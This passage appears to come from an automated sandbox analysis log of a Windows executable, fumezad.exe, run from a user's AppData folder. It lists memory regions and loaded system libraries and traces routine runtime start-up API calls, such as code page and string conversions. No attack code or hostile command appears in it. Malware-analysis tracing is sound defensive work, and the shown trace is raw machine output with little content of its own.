entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2190 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2191 start_va = 0x210000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 2192 start_va = 0x750d0000 end_va = 0x7512bfff entry_point = 0x750d0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2193 start_va = 0x75240000 end_va = 0x7527efff entry_point = 0x75240000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2194 start_va = 0x752b0000 end_va = 0x752b7fff entry_point = 0x752b0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2195 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2196 start_va = 0x1f0000 end_va = 0x1fffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 2197 start_va = 0x2f0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 2198 start_va = 0x480000 end_va = 0x4e6fff entry_point = 0x480000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2199 start_va = 0x75310000 end_va = 0x7531bfff entry_point = 0x75310000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2200 start_va = 0x75320000 end_va = 0x7537ffff entry_point = 0x75320000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2201 start_va = 0x75390000 end_va = 0x7542ffff entry_point = 0x75390000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 2202 start_va = 0x75510000 end_va = 0x75519fff entry_point = 0x75510000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 2203 start_va = 0x755d0000 end_va = 0x7565ffff entry_point = 0x755d0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2204 start_va = 0x758f0000 end_va = 0x759dffff entry_point = 0x758f0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2205 start_va = 0x759f0000 end_va = 0x75a08fff entry_point = 0x759f0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2206 start_va = 0x75b60000 end_va = 0x75bfcfff entry_point = 0x75b60000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 2207 start_va = 0x75c00000 end_va = 0x75cabfff entry_point = 0x75c00000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2208 start_va = 0x76110000 end_va = 0x76155fff entry_point = 0x76110000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2209 start_va = 0x76380000 end_va = 0x7647ffff entry_point = 0x76380000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2210 start_va = 0x76540000 end_va = 0x7664ffff entry_point = 0x76540000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2211 start_va = 0x773c0000 end_va = 0x774defff entry_point = 0x0 region_type = private name = "private_0x00000000773c0000" filename = "" Region: id = 2212 start_va = 0x774e0000 end_va = 0x775d9fff entry_point = 0x0 region_type = private name = "private_0x00000000774e0000" filename = "" Region: id = 2213 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 2214 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 2215 start_va = 0x4f0000 end_va = 0x677fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 2216 start_va = 0x75430000 end_va = 0x754fbfff entry_point = 0x75430000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2217 start_va = 0x75cb0000 end_va = 0x75d0ffff entry_point = 0x75cb0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2218 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2219 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2220 start_va = 0x680000 end_va = 0x800fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000680000" filename = "" Region: id = 2221 start_va = 0x810000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000810000" filename = "" Region: id = 2231 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 2232 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2233 start_va = 0x290000 end_va = 0x2d4fff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 2234 start_va = 0x1c10000 end_va = 0x1c38fff entry_point = 0x0 region_type = private name = "private_0x0000000001c10000" filename = "" Region: id = 2235 start_va = 0x1d0000 end_va = 0x1d1fff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 2253 start_va = 0x1c40000 end_va = 0x1d7bfff entry_point = 0x0 region_type = private name = "private_0x0000000001c40000" filename = "" Region: id = 2254 start_va = 0x1d80000 end_va = 0x1efffff entry_point = 0x0 region_type = private name = "private_0x0000000001d80000" filename = "" Region: id = 2255 start_va = 0x1c40000 end_va = 0x1d7bfff entry_point = 0x0 region_type = private name = "private_0x0000000001c40000" filename = "" Region: id = 2256 start_va = 0x1d80000 end_va = 0x1efffff entry_point = 0x0 region_type = private name = "private_0x0000000001d80000" filename = "" Region: id = 2257 start_va = 0x1c40000 end_va = 0x1d7bfff entry_point = 0x0 region_type = private name = "private_0x0000000001c40000" filename = "" Region: id = 2258 start_va = 0x1d80000 end_va = 0x1efffff entry_point = 0x0 region_type = private name = "private_0x0000000001d80000" filename = "" Region: id = 2260 start_va = 0x1c40000 end_va = 0x1d7bfff entry_point = 0x0 region_type = private name = "private_0x0000000001c40000" filename = "" Region: id = 2261 start_va = 0x1d80000 end_va = 0x1efffff entry_point = 0x0 region_type = private name = "private_0x0000000001d80000" filename = "" Region: id = 2262 start_va = 0x1c40000 end_va = 0x1c6afff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c40000" filename = "" Region: id = 2263 start_va = 0x1c70000 end_va = 0x1dabfff entry_point = 0x0 region_type = private name = "private_0x0000000001c70000" filename = "" Region: id = 2264 start_va = 0x1db0000 end_va = 0x1f2ffff entry_point = 0x0 region_type = private name = "private_0x0000000001db0000" filename = "" Region: id = 2265 start_va = 0x1c70000 end_va = 0x1dabfff entry_point = 0x0 region_type = private name = "private_0x0000000001c70000" filename = "" Region: id = 2266 start_va = 0x1db0000 end_va = 0x1f2ffff entry_point = 0x0 region_type = private name = "private_0x0000000001db0000" filename = "" Region: id = 2280 start_va = 0x1c70000 end_va = 0x1dabfff entry_point = 0x0 region_type = private name = "private_0x0000000001c70000" filename = "" Region: id = 2281 start_va = 0x1db0000 end_va = 0x1f2ffff entry_point = 0x0 region_type = private name = "private_0x0000000001db0000" filename = "" Thread: id = 148 os_tid = 0x138 [0110.505] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff78 | out: lpSystemTimeAsFileTime=0x18ff78*(dwLowDateTime=0xe53b14b0, dwHighDateTime=0x1d4be3a)) [0110.505] GetCurrentThreadId () returned 0x138 [0110.505] GetTickCount64 () returned 0x2892b [0110.505] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff70 | out: lpPerformanceCount=0x18ff70*=1818787700000) returned 1 [0110.505] GetStartupInfoW (in: lpStartupInfo=0x18ff08 | out: lpStartupInfo=0x18ff08*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x777dfd35, hStdError=0x77847daf)) [0110.506] GetCurrentThreadId () returned 0x138 [0110.507] GetCommandLineA () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0110.507] GetEnvironmentStringsW () returned 0x302028* [0110.507] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1351, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1351 [0110.507] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1351, lpMultiByteStr=0x302ac0, cbMultiByte=1351, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1351 [0110.507] FreeEnvironmentStringsW (penv=0x302028) returned 1 [0110.507] GetLastError () returned 0x5 [0110.507] SetLastError (dwErrCode=0x5) [0110.507] GetLastError () returned 0x5 [0110.507] SetLastError (dwErrCode=0x5) [0110.507] GetLastError () returned 0x5 [0110.507] SetLastError (dwErrCode=0x5) [0110.507] GetACP () returned 0x4e4 [0110.507] GetLastError () returned 0x5 [0110.507] SetLastError (dwErrCode=0x5) [0110.507] IsValidCodePage (CodePage=0x4e4) returned 1 [0110.507] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fedc | out: lpCPInfo=0x18fedc) returned 1 [0110.507] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f9a4 | out: lpCPInfo=0x18f9a4) returned 1 [0110.507] GetLastError () returned 0x5 [0110.507] SetLastError (dwErrCode=0x5) [0110.507] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fdb8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0110.507] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fdb8, cbMultiByte=256, lpWideCharStr=0x18f728, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0110.507] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f9b8 | out: lpCharType=0x18f9b8) returned 1 [0110.507] GetLastError () returned 0x5 [0110.507] SetLastError (dwErrCode=0x5) [0110.507] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fdb8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0110.508] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fdb8, cbMultiByte=256, lpWideCharStr=0x18f6f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0110.508] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0110.508] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0110.508] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x18fcb8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\xa2\x47\xcb\x9d\xf4\xfe\x18", lpUsedDefaultChar=0x0) returned 256 [0110.508] GetLastError () returned 0x5 [0110.508] SetLastError (dwErrCode=0x5) [0110.508] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fdb8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0110.508] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fdb8, cbMultiByte=256, lpWideCharStr=0x18f708, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0110.508] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0110.508] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4f8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0110.508] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x18fbb8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\x